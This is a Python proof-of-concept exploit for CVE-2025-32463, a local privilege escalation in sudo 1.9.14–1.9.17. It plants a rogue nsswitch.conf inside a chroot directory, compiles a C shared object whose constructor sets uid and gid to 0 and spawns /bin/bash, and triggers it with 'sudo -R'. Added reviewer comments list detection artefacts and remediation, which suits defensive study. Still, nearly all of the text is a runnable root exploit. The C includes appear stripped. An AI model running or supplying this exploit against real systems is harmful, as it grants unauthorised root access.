#!/bin/python3
# Exploit Title : Sudo local privilege escalation via chroot through /etc/nsswitch.conf from a user-controlled directory.
# Author : Pevinkumar A
# Date : 02/07/2025
# Affected versions : sudo 1.9.14 to 1.9.17
# CVE: CVE-2025-32463
# Vendor: Sudo Project
# Maintainer: Todd C. Miller
# Tested versions : 1.9.15p5 , 1.9.16p2
# Identified by : Rich Mirch (Stratascale Cyber Research Unit).
# Reference: Bash PoC by Stratascale Cyber Research Unit (CRU) team
# License : MIT
#
# Reviewer notes (defensive reading of this proof of concept):
#   * Trigger: the final step runs `sudo -R woot woot`, i.e. sudo's chroot
#     option pointed at a directory the caller created. Process telemetry
#     showing sudo invoked with -R / --chroot by an ordinary user is the
#     most direct signal.
#   * On-disk artefacts created by this script, all under a temporary
#     directory whose name starts with "CVE-2025-32463_":
#     woot/etc/nsswitch.conf, woot/etc/group, CVE-2025-32463.c and
#     libnss_/woot1337.so.2. main() removes the directory with
#     fd.cleanup() once the sudo call returns, so file-based evidence is
#     short-lived; file-creation and compiler-execution events are more
#     durable than a later disk search.
#   * Other observable steps: gcc building a shared object in a temp
#     directory, and an nsswitch.conf being written outside /etc.
#   * Remediation: install a sudo build from the vendor/distributor that
#     carries the fix for this CVE. The version check below is an exact
#     string match against upstream version names, so its result is not a
#     substitute for checking the distributor's advisory.

import os
import subprocess
import tempfile


def check_vulnerablity() -> bool:
    """
    Check whether the installed sudo reports a version in the affected list.

    Runs `sudo --version`, extracts the version token with sed and compares
    it, after stripping whitespace, against a hard-coded list.

    Args:
        None
    Returns:
        bool: True if the reported version is in the list. Otherwise the
        function prints a message and terminates the process via quit().
    """
    print("[ + ] checking the version of sudo.")
    # Exact-match allow-list of upstream version strings. A build whose
    # reported string is not listed here is treated as not vulnerable, and
    # a listed string is treated as vulnerable regardless of any patches
    # the distributor may have applied -- NOTE(review): confirm patch status
    # from the package changelog rather than from this check.
    vulnerable_versions = [
        "1.9.14", "1.9.14p1", "1.9.14p2", "1.9.14p3", "1.9.14p4", "1.9.14p5",
        "1.9.15", "1.9.15p1", "1.9.15p2", "1.9.15p3", "1.9.15p4", "1.9.15p5",
        "1.9.16", "1.9.16p1", "1.9.16p2", "1.9.17"
    ]
    # shell=True is used for the pipe; the command is a constant with no
    # external input interpolated. `sudo` and `sed` are resolved via PATH.
    version = subprocess.check_output("sudo --version | sed -n 's/^Sudo version \\([0-9.]*p*[0-9]*\\)/\\1/p'",shell=True,text=True)
    if version.strip() in vulnerable_versions:
        return True
    else:
        print('[ ! ] Looks it is not vulnerable for CVE-2025-32463.')
        quit()


def setup_tmp_dir() -> tuple[tempfile.TemporaryDirectory, str]:
    """
    Create the temporary working directory used by the later steps.

    Args:
        None
    Returns:
        tuple: the TemporaryDirectory object (kept so the caller can call
        cleanup() on it) and its path. Exits with status 1 on failure.
    """
    # The fixed prefix makes the working directory easy to recognise in
    # file-creation logs.
    prefix = 'CVE-2025-32463_'
    try:
        fd = tempfile.TemporaryDirectory(prefix=prefix)
        return fd, fd.name
    except Exception as E:
        print(f"[ ! ] Couldn't create temporary directory: {E}")
        exit(1)


def setup_required_directories(tmp_location: str) -> None:
    """
    Create the required subdirectories under the temporary directory.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None
    """
    # "woot" is the directory later passed to `sudo -R`; "woot/etc" holds
    # the nsswitch.conf and group files written by config_nss() and
    # copy_group(); "libnss_" receives the compiled shared object.
    required_directories = [
        "libnss_",
        "woot",
        "woot/etc"
    ]
    for directory in required_directories:
        directory_location = os.path.join(tmp_location,directory)
        os.makedirs(directory_location,exist_ok=True)


def config_nss(tmp_location: str) -> None:
    """
    Write the Name Service Switch configuration inside the chroot directory.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None. Exits with status 1 if the file cannot be written.
    """
    try:
        # A single "passwd" entry naming a non-standard source. Presumably
        # the name is chosen so that the NSS library lookup resolves to the
        # libnss_/woot1337.so.2 file built by compile_exploit() -- verify
        # against the referenced advisory.
        data = "passwd: /woot1337\n"
        nss_config_location = os.path.join(tmp_location,"woot","etc","nsswitch.conf")
        with open(nss_config_location,'w') as opened_nss_config:
            opened_nss_config.write(data)
        print("[ + ] Configured nss file.")
    except Exception as E:
        print(f"[ ! ] Couldn't config the nss: {E}")
        exit(1)


def copy_group(tmp_location: str) -> None:
    """
    Copy the host's /etc/group into the chroot directory's etc/ folder.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None. Exits with status 1 if either file operation fails.
    """
    try:
        copy_destination = os.path.join(tmp_location,"woot","etc","group")
        with open("/etc/group",'r') as group_file:
            group_details = group_file.read()
        with open(copy_destination,'w') as group:
            group.write(group_details)
        print("[ + ] Group details copy to the temporary location.")
    except Exception as E:
        print(f"[ ! ] Couldn't copy the group contant: {E}")
        exit(1)


def save_exploit(tmp_location:str) -> None:
    """
    Write the C source for the shared object into the temporary directory.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None. Exits with status 1 if the file cannot be written.
    """
    try:
        c_file_name = "CVE-2025-32463.c"
        # The C text is reproduced as it appears on this page.
        # NOTE(review): both #include directives have no header name here,
        # most likely stripped during page extraction.
        # The function is marked as a constructor, so it runs when the
        # shared object is loaded; it sets real/effective uid and gid to 0
        # and replaces the process with /bin/bash.
        c_code = """
#include
#include

__attribute__((constructor)) void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
"""
        c_file = os.path.join(tmp_location,c_file_name)
        with open(c_file,'w') as opened_c_file:
            opened_c_file.write(c_code)
        print("[ + ] Exploit saved.")
    except Exception as E:
        print(f"[ ! ] Couldn't save the exploit in temporary directory: {E}")
        exit(1)


def compile_exploit(tmp_location:str) -> None:
    """
    Compile the saved C source into a shared object with gcc.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None
    """
    shared_file_name = "woot1337.so.2"
    c_file = os.path.join(tmp_location,"CVE-2025-32463.c")
    shared_file_output = os.path.join(tmp_location,"libnss_",shared_file_name)
    # Argument-list form (no shell). Requires gcc on the host, so a compiler
    # launched against a temp directory is one of the observable steps.
    compile_status = subprocess.run(['gcc','-shared','-fPIC','-Wl,-init,woot','-o',shared_file_output,c_file],capture_output=True,text=True)
    # A non-zero return code only adds the failure line; the success line
    # below is printed unconditionally and execution continues.
    if compile_status.returncode:
        print(f"[ ! ] Couldn't compile the exploit in temporary directory.")
    print("[ + ] Exploit compiled successfully.")


def exploit(tmp_location:str) -> None:
    """
    Change into the temporary directory and invoke sudo with the chroot option.

    Args:
        tmp_location (str): Temporary directory location for the exploitation.
    Returns:
        None. Exits with status 1 if chdir or launching sudo raises.
    """
    try:
        # Relative paths are used from here on: "woot" is both the chroot
        # directory given to -R and the command name passed to sudo.
        os.chdir(tmp_location)
        subprocess.call(["sudo", "-R", "woot", "woot"])
    except Exception as E:
        print("[ + ] Couldn't exploit the vulnerability, somthing went wrong !!")
        exit(1)


def main() -> None:
    """
    Run the steps in order: version check, directory setup, file staging,
    compilation, the sudo invocation, then cleanup.

    Args:
        None
    Returns:
        None
    """
    # check_vulnerablity() either returns True or terminates the process,
    # so every step below runs only when the version matched the list.
    vulnerability_check = check_vulnerablity()
    if vulnerability_check:
        print('[ + ] Vulnerable for CVE-2025-32463.')
    print("[ + ] Setting up temporary directory.")
    fd, temporary_dir_locaction = setup_tmp_dir()
    print("[ + ] Creating required directories.")
    setup_required_directories(tmp_location=temporary_dir_locaction)
    print("[ + ] Configuring nss.")
    config_nss(tmp_location=temporary_dir_locaction)
    print("[ + ] Copying the group to the tmp/etc location.")
    copy_group(tmp_location=temporary_dir_locaction)
    print("[ + ] Saving the exploit in temporary directory.")
    save_exploit(tmp_location=temporary_dir_locaction)
    print("[ + ] Compiling the exploit.")
    compile_exploit(tmp_location=temporary_dir_locaction)
    print("[ + ] Exploiting...")
    exploit(tmp_location=temporary_dir_locaction)
    # Runs after the sudo call returns and removes the staged files.
    print("[ + ] Cleaning up.")
    fd.cleanup()


if __name__ == "__main__":
    main()